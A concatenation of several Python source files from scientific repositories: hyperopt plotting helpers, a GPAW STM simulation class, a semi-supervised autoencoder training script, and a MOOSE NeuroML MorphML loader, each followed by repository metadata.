    # Sort points by validation score so the gray mapping is monotonic.
    # BUGFIX: sorted() works on Python 2 and 3 alike; the original
    # zip(...).sort() idiom fails on Python 3 where zip() is an iterator.
    vxy = sorted(zip(vscores, x, y))
    vscores, x, y = zip(*vxy)
    vscores = np.asarray(vscores)
    max_score = vscores.max()
    min_score = vscores.min()
    # Map scores linearly into gray levels 0.9 (worst) .. 0.01 (best).
    # NOTE(review): divides by zero when all vscores are equal -- confirm
    # callers guarantee at least two distinct scores.
    colors = np.outer(0.9 - 0.89 * (vscores - min_score) / (max_score - min_score),
                      [1, 1, 1])
    plt.scatter(x, y, c=colors, marker='o', linewidths=0.1)
    # remove tick labels
    nums, texts = plt.xticks()
    plt.xticks(nums, [''] * len(nums))
    nums, texts = plt.yticks()
    plt.yticks(nums, [''] * len(nums))
class CoordType(object):
    """Marker base class for axis coordinate transforms."""
    pass


class RealCoord(CoordType):
    """Identity transform: values are plotted as-is (as a numpy array)."""
    @staticmethod
    def preimage(x):
        return np.asarray(x)


class LogCoord(CoordType):
    """Logarithmic transform: values are plotted as log(x)."""
    @staticmethod
    def preimage(x):
        return np.log(x)


class Log0Coord(CoordType):
    """Log transform tolerating zeros.

    Zeros are replaced by half the smallest value of x before the log is
    taken (so strictly positive inputs are unchanged).
    """
    @staticmethod
    def preimage(x):
        x = np.asarray(x)
        zero_fill = (x == 0) * x.min() / 2
        return np.log(x + zero_fill)

# Integer axes reuse the real/log transforms unchanged.
IntCoord = RealCoord
LogIntCoord = LogCoord


class CategoryCoord(CoordType):
    """Transform for categorical axes.

    Each value is replaced by its index in the `categories` list given at
    construction time; with no (or an empty) category list the input is
    passed through unchanged.
    """
    def __init__(self, categories=None):
        self.categories = categories

    def preimage(self, x):
        if not self.categories:
            return x
        return np.asarray([self.categories.index(item) for item in x])
def rexp_pairs(x, y, vscores, xtype, ytype):
    """Scatter-plot y vs. x after mapping each axis through its CoordType
    transform (e.g. RealCoord, LogCoord, CategoryCoord); see rexp_pairs_raw.
    """
    return rexp_pairs_raw(xtype.preimage(x), ytype.preimage(y), vscores)
class MultiHistory(object):
    """
    Show the history of multiple optimization algorithms.

    NOTE(review): the plotting methods use a name `plt` that is not bound at
    module scope in the visible file -- confirm it is set before use.
    """
    def __init__(self):
        # each entry: (job documents, y values, color, legend label)
        self.histories = []
    def add_experiment(self, mj, y_fn, start=0, stop=sys.maxint,
                       color=None,
                       label=None):
        """Record one experiment's booked, finite-loss trials.

        :param mj: iterable of job documents (e.g. a MongoJobs instance)
        :param y_fn: maps a job document to a loss, or None to skip the job
        :param start, stop: slice of the book_time-sorted trials to keep
        :param color, label: matplotlib scatter color and legend label
        """
        # NOTE: y_fn is evaluated up to three times per job here.
        trials = [(job['book_time'], job, y_fn(job))
                  for job in mj if ('book_time' in job
                                    and y_fn(job) is not None
                                    and np.isfinite(y_fn(job)))]
        trials.sort()
        trials = trials[start:stop]
        if trials:
            self.histories.append((
                [t[1] for t in trials],
                [t[2] for t in trials],
                color, label))
        else:
            print 'NO TRIALS'
    def add_scatters(self):
        """Scatter each recorded history (loss vs. trial index) on the
        current axes."""
        for t, y, c, l in self.histories:
            print 'setting label', l
            plt.scatter(
                np.arange(len(y)),
                y,
                c=c,
                label=l,
                s=12)
    def main_show(self, title=None):
        """Draw all recorded histories and display the figure."""
        self.add_scatters()
        if title:
            plt.title(title)
        plt.show()
def main_plot_histories(cls):
    """Command-line helper: overlay loss histories of several algorithms.

    Reads from sys.argv: [2] a connection-string template with two '%s'
    slots (algo, dataset), [3] a comma-separated list of algorithm names,
    [4] the dataset name, and optional [5]/[6] start/stop trial indices.

    NOTE(review): `cls` is unused and this is written like an unbound
    method -- confirm how it is registered/called.
    """
    import plotting
    conn_str_template = sys.argv[2]
    algos = sys.argv[3].split(',')
    dataset_name = sys.argv[4]
    start = int(sys.argv[5]) if len(sys.argv)>5 else 0
    stop = int(sys.argv[6]) if len(sys.argv)>6 else sys.maxint
    mh = plotting.MultiHistory()
    colors = ['r', 'y', 'b', 'g', 'c', 'k']

    def custom_err_fn(trial):
        # error = 1 - best validation accuracy, for completed trials only;
        # returns None (skip) for unfinished trials or dataset-specific
        # outlier losses.
        if 2 == trial['status']:
            rval = 1.0 - trial['result']['best_epoch_valid']
            if rval > dict(
                    convex=.4,
                    mnist_rotated_background_images=2)[dataset_name]:
                return None
            else:
                return rval

    for c, algo in zip(colors, algos):
        conn_str = conn_str_template % (algo, dataset_name)
        print 'algo', algo
        mh.add_experiment(
            mj=MongoJobs.new_from_connection_str(conn_str),
            y_fn=custom_err_fn,
            color=c,
            label=algo,
            start=start,
            stop=stop)
    plt = plotting.plt
    # reference line: manually tuned grid-search result for this dataset
    plt.axhline(
        1.0 - icml07.dbn3_scores[dataset_name],
        c='k', label='manual+grid')  # , dashes=[0,1])
    mh.add_scatters()
    plt.legend()
    plt.title(dataset_name)
    plt.show()
class ScatterByConf(object):
trial_color_dict = {0:'k', 1:'g', 2:'b', 3:'r'}
def __init__(self, conf_template, confs, status, y):
self.conf_template = conf_template
self.confs = confs
self.y = np.asarray(y)
assert self.y.ndim == 1
self.status = status
self.colors = np.asarray(
[self.trial_color_dict.get(s, None) for s in self.status])
self.a_choices = np.array([[e['choice']
for e in t.flatten()]
for t in confs])
self.nones = np.array([[None
for e in t.flatten()]
for t in confs])
self.a_names = conf_template.flatten_names()
self.a_vars = [not np.all(self.a_choices[:,i]==self.nones[:,i])
for i,name in enumerate(self.a_names)]
assert len(self.y) == len(self.a_choices)
assert len(self.y) == len(self.colors)
def trial_color(self, t):
return self.trial_color_dict.get(t['status'], None)
def scatter_one(self, column):
assert self.a_vars[column]
non_missing = self.a_choices[:,column] != self.nones[:,column]
x = self.a_choices[non_missing, column]
y = self.y[non_missing]
c = self.colors[non_missing]
plt.xlabel(self.a_names[column])
plt.scatter(x, y, c=c)
def main_show_one(self, column):
# show all conf effects in a grid of scatter-plots
self.scatter_one(column)
plt.show()
def main_show_all(self, columns=None):
if columns == None:
columns = range(len(self.a_vars))
columns = [c for c in columns if c < len(self.a_vars)]
n_vars = np.sum(self.a_vars[c] for c in columns)
print n_vars
n_rows = 1
n_cols = 10000
n_vars -= 1
while n_cols > 5 and n_cols > 3 * n_rows: # while "is ugly"
n_vars += 1 # leave one more space at the end...
n_rows = int(np.sqrt(n_vars))
while n_vars % n_rows:
n_rows -= 1
n_cols = n_vars / n_rows
print n_rows, n_cols
subplot_idx = 0
for var_idx in columns:
if self.a_vars[var_idx]:
plt.subplot(n_rows, n_cols, subplot_idx+1)
self.scatter_one(var_idx)
subplot_idx += 1
plt.show()
def main_plot_scatter(self, argv):
    """Scatter-plot losses against each configuration variable in a range.

    :param argv: two strings, parsed as the low and high column indices

    NOTE(review): written as a method (uses self.bandit, self.trials,
    self.statuses, self.losses) but appears outside any class here --
    confirm the intended enclosing class.
    """
    low_col = int(argv[0])
    high_col = int(argv[1])
    # upgrade jobs in db to ht_dist2-compatible things
    scatter_by_conf = ScatterByConf(
        self.bandit.template,
        self.trials,
        status = self.statuses(),
        y = self.losses())
    return scatter_by_conf.main_show_all(range(low_col, high_col))
| CVML/hyperopt | hyperopt/plotting.py | Python | bsd-3-clause | 19,940 | [
"Gaussian"
] | be6b7e65009b3a022833e7c43f664ead2d567d6074aa355e411da774930df3dc |
import numpy as np
from ase.units import Bohr
from gpaw import Calculator
from gpaw.localized_functions import create_localized_functions as clf
class STM:
    """Combine a surface and a tip GPAW calculation for an STM simulation.

    Builds a combined Atoms object (surface + tip), sets up an LCAO
    calculator for it, and collects the localized basis functions and
    effective potentials used downstream.

    NOTE(review): written against a historical GPAW API (Calculator,
    calc.nuclei, gd.h_c, ...) -- confirm against the installed version.
    """
    def __init__(self, surfacecalc, tipcalc):
        # calculators for the isolated surface and tip systems
        self.scalc = surfacecalc
        self.tcalc = tipcalc
        # the corresponding Atoms objects
        self.surface = surfacecalc.get_atoms()
        self.tip = tipcalc.get_atoms()
    def initialize(self):
        """Build the combined surface+tip system and its LCAO calculator,
        and cache potentials, basis functions and grid descriptors."""
        tip = self.tip.copy()
        # height of the tip cell along the z axis
        htip = tip.get_cell()[2, 2]
        #tip.translate((0, 0, htip))
        self.combined = self.surface + tip
        # stack the tip cell on top of the surface cell along z
        self.combined.cell[2, 2] += htip
        self.calc = Calculator(h=0.2, eigensolver='lcao', basis='sz',
                               txt=None)
        #self.combined.set_calculator(self.calc)
        self.calc.initialize(self.combined)
        self.calc.hamiltonian.initialize(self.calc)
        self.calc.density.initialize()
        # spin-0 effective potentials of the separate tip/surface runs
        self.vtip_G = self.tcalc.hamiltonian.vt_sG[0]
        self.vsurface_G = self.scalc.hamiltonian.vt_sG[0]
        self.get_basis_functions()
        # grid descriptors of the tip and surface calculations
        self.tgd = self.tcalc.wfs.gd
        self.sgd = self.scalc.wfs.gd
    def get_basis_functions(self):
        """Collect the localized basis functions of every nucleus of the
        combined calculation as (snapped scaled position, grid values)."""
        gd = self.calc.wfs.gd
        self.functions = []
        for nucleus in self.calc.nuclei:
            # snap the scaled position to the nearest grid point
            spos0_c = np.round(nucleus.spos_c * gd.N_c) / gd.N_c
            f_iG = clf(nucleus.setup.phit_j, gd,
                       nucleus.spos_c + 0.5 - spos0_c,
                       dtype=float, cut=False,
                       forces=False, lfbc=None).box_b[0].get_functions()
            self.functions.append((spos0_c, f_iG))
    def set_position(self, dG):
        """Shift the tip by dG grid points and update the calculator.

        :param dG: tip displacement in units of grid spacings (converted
            to Angstrom via the grid spacing h_c and Bohr)
        """
        positions = self.combined.get_positions()
        tippositions = self.tip.get_positions()
        tippositions += dG * self.calc.wfs.gd.h_c / Bohr
        # the tip atoms are the last len(self.tip) entries of the combined system
        positions[-len(self.tip):] = tippositions
        self.combined.set_positions(positions)
        self.calc.set_positions(self.combined)
        self.calc.hamiltonian.initialize_lcao()
| qsnake/gpaw | gpaw/stm/__init__.py | Python | gpl-3.0 | 1,977 | [
"ASE",
"GPAW"
] | 3dd55e08a88cf4207b1fd6cec3a6f8fe33679330d5c7b8af13239b1efc09d26e |
import numpy as np
import argparse
from time import time
from builder.args import addLoggingParams, addDebuggingParams, \
addEarlyStop, addSupDataParams
from builder.profiler import setupLogging
from ae.net import TrainerSAENetwork
from ae.contiguousAE import ContiguousAutoEncoder
from ae.convolutionalAE import ConvolutionalAutoEncoder
from dataset.ingest.labeled import ingestImagery
from nn.contiguousLayer import ContiguousLayer
from nn.trainUtils import trainUnsupervised, trainSupervised
from nn.net import TrainerNetwork
if __name__ == '__main__' :
    '''This application runs semi-supervised training on a given dataset. The
       ultimate goal is to set up the early layers of the Neural Network to
       identify patterns in the data via unsupervised learning. Here we use a
       Stacked Autoencoder (SAE) and greedy training.

       We then translate the SAE to a Neural Network (NN) and add a
       classification layer. From there we use supervised training to
       fine-tune the weights to classify objects we select as important.
    '''
    def _parseBool(value) :
        '''Parse a command-line boolean string.

           argparse's builtin type=bool treats every non-empty string --
           including "False" and "0" -- as True, so common spellings are
           interpreted explicitly here instead.
        '''
        return str(value).strip().lower() in ('1', 'true', 't', 'yes', 'y')

    parser = argparse.ArgumentParser()
    addDebuggingParams(parser)
    addLoggingParams(parser)
    parser.add_argument('--learnC', dest='learnC', type=float, default=.0031,
                        help='Rate of learning on Convolutional Layers.')
    parser.add_argument('--learnF', dest='learnF', type=float, default=.0015,
                        help='Rate of learning on Fully-Connected Layers.')
    parser.add_argument('--contrF', dest='contrF', type=float, default=None,
                        help='Rate of contraction of the latent space on ' +
                             'Fully-Connected Layers.')
    parser.add_argument('--momentum', dest='momentum', type=float, default=.3,
                        help='Momentum rate all layers.')
    # BUGFIX: was type=bool, under which '--dropout False' evaluated to True
    # and the option could never be disabled from the command line.
    parser.add_argument('--dropout', dest='dropout', type=_parseBool,
                        default=False,
                        help='Enable dropout throughout the network. Dropout '\
                             'percentages are based on optimal reported '\
                             'results. NOTE: Networks using dropout need to '\
                             'increase both neural breadth and learning rates')
    parser.add_argument('--kernel', dest='kernel', type=int, default=6,
                        help='Number of Convolutional Kernels in each Layer.')
    parser.add_argument('--neuron', dest='neuron', type=int, default=120,
                        help='Number of Neurons in Hidden Layer.')
    addEarlyStop(parser)
    addSupDataParams(parser, 'leNet5')
    options = parser.parse_args()

    # setup the logger
    log, prof = setupLogging(options, 'semiSupervisedTrainer')

    # create a random number generator for efficiency
    from numpy.random import RandomState
    rng = RandomState(int(time()))

    # NOTE: The pickleDataset will silently use previously created pickles if
    #       one exists (for efficiency). So watch out for stale pickles!
    train, test, labels = ingestImagery(filepath=options.data, shared=True,
                                        batchSize=options.batchSize,
                                        holdoutPercentage=options.holdout,
                                        log=log)
    trainShape = train[0].shape.eval()

    # create the stacked network
    network = TrainerSAENetwork(train, greedyNetwork=options.greedyNet,
                                prof=prof, debug=options.debug)

    if options.synapse is not None :
        # load a previously saved network
        network.load(options.synapse)

        # reset the learning rates for all four layers
        network.setLayerLearningRate(0, options.learnC)
        network.setLayerLearningRate(1, options.learnC)
        network.setLayerLearningRate(2, options.learnF)
        network.setLayerLearningRate(3, options.learnF)

        # reset the momentum rates for all four layers
        network.setLayerMomentumRate(0, options.momentum)
        network.setLayerMomentumRate(1, options.momentum)
        network.setLayerMomentumRate(2, options.momentum)
        network.setLayerMomentumRate(3, options.momentum)
    else :
        log.info('Initializing Network...')

        # add convolutional layers
        network.addLayer(ConvolutionalAutoEncoder(
            layerID='c1', inputSize=trainShape[1:],
            kernelSize=(options.kernel,trainShape[2],5,5),
            downsampleFactor=(2,2), randomNumGen=rng,
            dropout=.8 if options.dropout else 1.,
            learningRate=options.learnC))
        # refactor the output to be (numImages*numKernels,1,numRows,numCols)
        # this way we don't combine the channels kernels we created in
        # the first layer and destroy our dimensionality
        network.addLayer(ConvolutionalAutoEncoder(
            layerID='c2', inputSize=network.getNetworkOutputSize(),
            kernelSize=(options.kernel,options.kernel,5,5),
            downsampleFactor=(2,2), randomNumGen=rng,
            dropout=.5 if options.dropout else 1.,
            learningRate=options.learnC))

        # add fully connected layers
        network.addLayer(ContiguousAutoEncoder(
            layerID='f3',
            inputSize=(network.getNetworkOutputSize()[0],
                       np.prod(network.getNetworkOutputSize()[1:])),
            numNeurons=options.neuron, learningRate=options.learnF,
            dropout=.5 if options.dropout else 1.,
            randomNumGen=rng))
        # the final output layer is removed from the normal NN --
        # the output layer is special, as it makes decisions about
        # patterns identified in previous layers, so it should only
        # be influenced/trained during supervised learning.

    # train the SAE for unsupervised pattern recognition
    bestNetwork = trainUnsupervised(network, __file__, options.data,
                                    numEpochs=options.limit, stop=options.stop,
                                    synapse=options.synapse, base=options.base,
                                    log=log)

    # translate into a neural network --
    # this transfers our unsupervised pre-training into a decent
    # starting condition for our supervised learning
    network = TrainerNetwork(train, test, labels, filepath=bestNetwork,
                             prof=prof, debug=options.debug)

    # add the classification layer
    network.addLayer(ContiguousLayer(
        layerID='f4', input=network.getNetworkOutput(),
        inputSize=network.getNetworkOutputSize(), numNeurons=labels.shape[0],
        learningRate=options.learnF, randomNumGen=rng))

    # train the NN for supervised classification
    trainSupervised(network, __file__, options.data,
                    numEpochs=options.limit, stop=options.stop,
                    synapse=options.synapse, base=options.base, log=log)
| mbojrab/playbox | trunk/projects/supervised/semiSupervisedTrainer.py | Python | mit | 6,842 | [
"NEURON"
] | aadfb04c709208d87300ffb9a39e027bdf6b453596bfe6491b1d75971e1b66ad |
# -*- coding: utf-8 -*-
## Description: class MorphML for loading MorphML from file or xml element into MOOSE
## Version 1.0 by Aditya Gilra, NCBS, Bangalore, India, 2011 for serial MOOSE
## Version 1.5 by Niraj Dudani, NCBS, Bangalore, India, 2012, ported to parallel MOOSE
## Version 1.6 by Aditya Gilra, NCBS, Bangalore, India, 2012, further changes for parallel MOOSE
## Version 1.7 by Aditya Gilra, NCBS, Bangalore, India, 2013, further support for NeuroML 1.8.1
## Version 1.8 by Aditya Gilra, NCBS, Bangalore, India, 2013, changes for new IntFire and SynHandler classes
"""
NeuroML.py is the preferred interface. Use this only if NeuroML L1,L2,L3 files are misnamed/scattered.
Instantiate MorphML class, and thence use methods:
readMorphMLFromFile(...) to load a standalone MorphML from file OR
readMorphML(...) to load from an xml.etree xml element (could be part of a larger NeuroML file).
It is assumed that any channels and synapses referred to by above MorphML
have already been loaded under that same name in /library in MOOSE (use ChannelML loader).
"""
from __future__ import print_function
from xml.etree import cElementTree as ET # cELementTree is mostly API-compatible but faster than ElementTree
import string
import sys
import math
from os import path
import moose
from moose import utils as moose_utils
from moose.neuroml import utils as neuroml_utils
from moose.neuroml.ChannelML import ChannelML, make_new_synapse
import logging
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(name)-12s: %(levelname)-8s %(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# NOTE(review): the handler is attached to the 'moose.nml.morphml' logger,
# but the `_logger` used throughout this module is the root logger ('') --
# confirm this mismatch is intended.
logging.getLogger('moose.nml.morphml').addHandler(console)
_logger = logging.getLogger('')
class MorphML():
    def __init__(self, nml_params):
        """Store NeuroML 1.x namespace URIs and loader parameters.

        :param nml_params: dict with at least 'model_dir' (directory searched
            for channel/synapse XML files) and 'temperature'.
        """
        # XML namespace URIs used when querying NeuroML 1.x documents
        self.neuroml = 'http://morphml.org/neuroml/schema'
        self.bio = 'http://morphml.org/biophysics/schema'
        self.mml = 'http://morphml.org/morphml/schema'
        self.nml = 'http://morphml.org/networkml/schema'
        self.meta = 'http://morphml.org/metadata/schema'
        # cellname -> [moose cell, {segment id -> compartment}]
        self.cellDictBySegmentId = {}
        # cellname -> [moose cell, {cable id -> [compartments]}]
        self.cellDictByCableId = {}
        self.nml_params = nml_params
        self.model_dir = nml_params['model_dir']
        self.temperature = nml_params['temperature']
def readMorphMLFromFile(self,filename,params={}):
"""
specify params for this MorphML file as a dict:
presently combineSegments and createPotentialSynapses are implemented.
See readMorphML().
See also nml_params in __init__().
returns { cellname1 : (segDict,cableDict), ... }
see readMorphML(...) for segDict and cableDict
"""
_logger.info("Reading morphology from %s" % filename)
try:
tree = ET.parse(filename)
except Exception as e:
_logger.error("Failed to load morphology from file %s" % filename)
neuroml_element = tree.getroot()
cellsDict = {}
for cell in neuroml_element.findall('.//{'+self.neuroml+'}cell'):
if 'lengthUnits' in neuroml_element.attrib:
lengthUnits = neuroml_element.attrib['lengthUnits']
else:
lengthUnits = 'micrometer'
cellDict = self.readMorphML(cell,params,lengthUnits)
cellsDict.update(cellDict)
return cellsDict
def readMorphML(self,cell,params={},lengthUnits="micrometer"):
"""
returns cellDict = { cellname: (segDict, cableDict) } # note: single cell only
where segDict = { segid1 : [ segname,(proximalx,proximaly,proximalz),
(distalx,distaly,distalz),diameter,length,[potential_syn1, ... ] ] , ... }
segname is "<name>_<segid>" because 1) guarantees uniqueness,
& 2) later scripts obtain segid from the compartment's name!
and cableDict = { cablegroupname : [campartment1name, compartment2name, ... ], ... }.
params is dict which can contain, combineSegments and/or createPotentialSynapses,
both boolean.
"""
if lengthUnits in ['micrometer','micron']:
self.length_factor = 1e-6
else:
self.length_factor = 1.0
cellname = cell.attrib["name"]
moose.Neutral('/library') # creates /library in MOOSE tree; elif present, wraps
_logger.info("Loading cell %s into /library ." % cellname)
#~ moosecell = moose.Cell('/library/'+cellname)
#using moose Neuron class - in previous version 'Cell' class Chaitanya
moosecell = moose.Neuron('/library/'+cellname)
self.cellDictBySegmentId[cellname] = [moosecell,{}]
self.cellDictByCableId[cellname] = [moosecell,{}]
self.segDict = {}
if 'combineSegments' in params:
self.combineSegments = params['combineSegments']
else:
self.combineSegments = False
if 'createPotentialSynapses' in params:
self.createPotentialSynapses = params['createPotentialSynapses']
else:
self.createPotentialSynapses = False
_logger.info("readMorphML using combineSegments = %s" % self.combineSegments)
###############################################
#### load cablegroups into a dictionary
self.cablegroupsDict = {}
self.cablegroupsInhomoparamsDict = {}
## Two ways of specifying cablegroups in neuroml 1.x
## <cablegroup>s with list of <cable>s
cablegroups = cell.findall(".//{"+self.mml+"}cablegroup")
for cablegroup in cablegroups:
cablegroupname = cablegroup.attrib['name']
self.cablegroupsDict[cablegroupname] = []
self.cablegroupsInhomoparamsDict[cablegroupname] = []
for cable in cablegroup.findall(".//{"+self.mml+"}cable"):
cableid = cable.attrib['id']
self.cablegroupsDict[cablegroupname].append(cableid)
# parse inhomogenous_params
for inhomogeneous_param in cablegroup.findall(".//{"+self.mml+"}inhomogeneous_param"):
metric = inhomogeneous_param.find(".//{"+self.mml+"}metric")
if metric.text == 'Path Length from root':
inhomoparamname = inhomogeneous_param.attrib['name']
inhomoparamvar = inhomogeneous_param.attrib['variable']
self.cablegroupsInhomoparamsDict[cablegroupname].append(\
(inhomoparamname,inhomoparamvar))
else:
_logger.warning('Only "Path Length from root" metric is '
' supported currently, ignoring %s ' % metric.text
)
## <cable>s with list of <meta:group>s
cables = cell.findall(".//{"+self.mml+"}cable")
for cable in cables:
cableid = cable.attrib['id']
cablegroups = cable.findall(".//{"+self.meta+"}group")
for cablegroup in cablegroups:
cablegroupname = cablegroup.text
if cablegroupname in self.cablegroupsDict:
self.cablegroupsDict[cablegroupname].append(cableid)
else:
self.cablegroupsDict[cablegroupname] = [cableid]
###################################################
## load all mechanisms in this cell into /library for later copying
## set which compartments have integrate_and_fire mechanism
self.intFireCableIds = {} # dict with keys as Compartments/cableIds which are IntFire
# with mechanismnames as values
for mechanism in cell.findall(".//{"+self.bio+"}mechanism"):
mechanismname = mechanism.attrib["name"]
passive = False
if "passive_conductance" in mechanism.attrib:
if mechanism.attrib['passive_conductance'] in ["true",'True','TRUE']:
passive = True
if not passive:
## if channel does not exist in library load it from xml file
if not moose.exists("/library/"+mechanismname):
_logger.info("Loading mechanism %s into library." % mechanismname)
cmlR = ChannelML(self.nml_params)
model_filename = mechanismname+'.xml'
model_path = neuroml_utils.find_first_file(model_filename,self.model_dir)
if model_path is not None:
cmlR.readChannelMLFromFile(model_path)
else:
raise IOError(
'For mechanism {0}: files {1} not found under {2}.'.format(
mechanismname, model_filename, self.model_dir)
)
## set those compartments to be LIF for which
## any integrate_and_fire parameter is set
if not moose.exists( "/library/"+mechanismname):
_logger.warn("Mechanism doesn't exist: %s " % mechanismname)
moose.le( '/library' )
moosemech = moose.element("/library/"+mechanismname)
if moose.exists(moosemech.path+"/integrate_and_fire"):
mooseIaF = moose.element(moosemech.path+"/integrate_and_fire") # Mstring
if mooseIaF.value in ['true','True','TRUE']:
mech_params = mechanism.findall(".//{"+self.bio+"}parameter")
for parameter in mech_params:
parametername = parameter.attrib['name']
## check for the integrate_and_fire parameters
if parametername in ['threshold', 't_refrac', 'v_reset','g_refrac']:
for group in parameter.findall(".//{"+self.bio+"}group"):
cablegroupname = group.text
if cablegroupname == 'all':
self.intFireCableIds = {'all':mechanismname}
break
else:
for cableid in self.cablegroupsDict[cablegroupname]:
## only one intfire mechanism is allowed in a cable
## the last one parsed will override others
self.intFireCableIds[cableid] = mechanismname
if 'all' in self.intFireCableIds:
break
############################################################
#### load morphology and connections between compartments
## Many neurons exported from NEURON have multiple segments in a section
## If self.combineSegments = True,
## then combine those segments into one Compartment / section
## for combining, assume segments of a compartment/section are in increasing order
## and assume all segments of a compartment/section have the same cableid
## findall() returns elements in document order:
running_cableid = ''
running_segid = ''
running_comp = None
running_diameter = 0.0
running_dia_nums = 0
segments = cell.findall(".//{"+self.mml+"}segment")
segmentstotal = len(segments)
for segnum,segment in enumerate(segments):
segmentname = segment.attrib['name']
## cable is an optional attribute. WARNING: Here I assume it is always present.
cableid = segment.attrib['cable']
segmentid = segment.attrib['id']
## if old cableid still running AND self.combineSegments == True,
## then don't start a new compartment, skip to next segment
if cableid == running_cableid and self.combineSegments:
self.cellDictBySegmentId[cellname][1][segmentid] = running_comp
proximal = segment.find('./{'+self.mml+'}proximal')
if proximal is not None:
running_diameter += float(proximal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
distal = segment.find('./{'+self.mml+'}distal')
if distal is not None:
running_diameter += float(distal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
## if (self.combineSegments and new cableid starts) or if not self.combineSegments,
## then start a new compartment
else:
## Create a new compartment
## the moose "hsolve" method assumes compartments to be
## asymmetric compartments and symmetrizes them
## but that is not what we want when translating
## from Neuron which has only symcompartments -- so be careful!
## Check if integrate_and_fire mechanism is present,
## if so use LIF instead of Compartment
moosecompname = segmentname+'_'+segmentid # just segmentname is NOT unique
# eg: mitral bbmit exported from NEURON
moosecomppath = moosecell.path+'/'+moosecompname
mechanismname = None
if 'all' in self.intFireCableIds:
mechanismname = self.intFireCableIds['all']
if cableid in self.intFireCableIds:
mechanismname = self.intFireCableIds[cableid]
if mechanismname is not None: # this cableid is an intfire
# create LIF (subclass of Compartment) and set to default values
moosecomp = moose.LIF(moosecomppath)
mname = '/library/' + mechanismname
moosechannel = moose.element(mname) if moose.exists(mname) else moose.Neutral(mname)
# Mstring values are 'string'; make sure to convert them to
# float else it will seg-fault with python3+
moosechannelval = moose.Mstring(moosechannel.path+'/vReset')
moosecomp.vReset = float(moosechannelval.value)
moosechannelval = moose.Mstring(moosechannel.path+'/thresh')
moosecomp.thresh = float( moosechannelval.value )
moosechannelval = moose.Mstring(moosechannel.path+'/refracT')
moosecomp.refractoryPeriod = eval(moosechannelval.value)
## refracG is currently not supported by moose.LIF
## when you implement it, check if refracG or g_refrac
## is a conductance density or a conductance, I think the former
#moosechannelval = moose.Mstring(moosechannel.path+'/refracG')
else:
moosecomp = moose.Compartment(moosecomppath)
self.cellDictBySegmentId[cellname][1][segmentid] = moosecomp
## cables are grouped and mechanism densities are set for cablegroups later.
## hence I will need to refer to segment according to which cable it belongs to.
## if combineSegments is False, there can be multiple segments per cable,
## so make array of compartments for cellDictByCableId[cellname][1][cableid]
if cableid in self.cellDictByCableId[cellname][1]:
self.cellDictByCableId[cellname][1][cableid].append(moosecomp)
else:
self.cellDictByCableId[cellname][1][cableid] = [moosecomp]
running_cableid = cableid
running_segid = segmentid
running_comp = moosecomp
running_diameter = 0.0
running_dia_nums = 0
if 'parent' in segment.attrib:
parentid = segment.attrib['parent'] # I assume the parent is created before the child
# so that I can immediately connect the child.
parent = self.cellDictBySegmentId[cellname][1][parentid]
## It is always assumed that axial of parent is connected to raxial of moosesegment
## THIS IS WHAT GENESIS readcell() DOES!!! UNLIKE NEURON!
## THIS IS IRRESPECTIVE OF WHETHER PROXIMAL x,y,z OF PARENT = PROXIMAL x,y,z OF CHILD.
## THIS IS ALSO IRRESPECTIVE OF fraction_along_parent SPECIFIED IN CABLE!
## THUS THERE WILL BE NUMERICAL DIFFERENCES BETWEEN MOOSE/GENESIS and NEURON.
## moosesegment sends Ra and Vm to parent, parent sends only Vm
## actually for symmetric compartment, both parent and moosesegment require each other's Ra/2,
## but axial and raxial just serve to distinguish ends.
moose.connect(parent,'axial',moosecomp,'raxial')
else:
parent = None
proximal = segment.find('./{'+self.mml+'}proximal')
if proximal is None: # If proximal tag is not present,
# then parent attribute MUST be present in the segment tag!
## if proximal is not present, then
## by default the distal end of the parent is the proximal end of the child
moosecomp.x0 = parent.x
moosecomp.y0 = parent.y
moosecomp.z0 = parent.z
else:
moosecomp.x0 = float(proximal.attrib["x"])*self.length_factor
moosecomp.y0 = float(proximal.attrib["y"])*self.length_factor
moosecomp.z0 = float(proximal.attrib["z"])*self.length_factor
running_diameter += float(proximal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
distal = segment.find('./{'+self.mml+'}distal')
if distal is not None:
running_diameter += float(distal.attrib["diameter"]) * self.length_factor
running_dia_nums += 1
## finished creating new compartment
## Update the end position, diameter and length, and segDict of this comp/cable/section
## with each segment that is part of this cable (assumes contiguous segments in xml).
## This ensures that we don't have to do any 'closing ceremonies',
## if a new cable is encountered in the next iteration.
if distal is not None:
running_comp.x = float(distal.attrib["x"])*self.length_factor
running_comp.y = float(distal.attrib["y"])*self.length_factor
running_comp.z = float(distal.attrib["z"])*self.length_factor
## Set the compartment diameter as the average diameter of all the segments in this section
running_comp.diameter = running_diameter / float(running_dia_nums)
## Set the compartment length
running_comp.length = math.sqrt((running_comp.x-running_comp.x0)**2+\
(running_comp.y-running_comp.y0)**2+(running_comp.z-running_comp.z0)**2)
## NeuroML specs say that if (x0,y0,z0)=(x,y,z), then round compartment e.g. soma.
## In Moose set length = dia to give same surface area as sphere of dia.
if running_comp.length == 0.0:
running_comp.length = running_comp.diameter
## Set the segDict
## the empty list at the end below will get populated
## with the potential synapses on this segment, in function set_compartment_param(..)
self.segDict[running_segid] = [running_comp.name,\
(running_comp.x0,running_comp.y0,running_comp.z0),\
(running_comp.x,running_comp.y,running_comp.z),\
running_comp.diameter,running_comp.length,[]]
if neuroml_utils.neuroml_debug:
_logger.info('Set up compartment/section %s' % running_comp.name)
###############################################
#### load biophysics into the compartments
biophysics = cell.find(".//{"+self.neuroml+"}biophysics")
if biophysics is not None:
## see pg 219 (sec 13.2) of Book of Genesis for Physiological Units
if biophysics.attrib["units"] == 'Physiological Units':
CMfactor = 1e-2 # F/m^2 from microF/cm^2
Cfactor = 1e-6 # F from microF
RAfactor = 1e1 # Ohm*m from KOhm*cm
RMfactor = 1e-1 # Ohm*m^2 from KOhm*cm^2
Rfactor = 1e-3 # Ohm from KOhm
Efactor = 1e-3 # V from mV
Gfactor = 1e1 # S/m^2 from mS/cm^2
Ifactor = 1e-6 # A from microA
Tfactor = 1e-3 # s from ms
else:
CMfactor = 1.0
Cfactor = 1.0
RAfactor = 1.0
RMfactor = 1.0
Rfactor = 1.0
Efactor = 1.0
Gfactor = 1.0
Ifactor = 1.0
Tfactor = 1.0
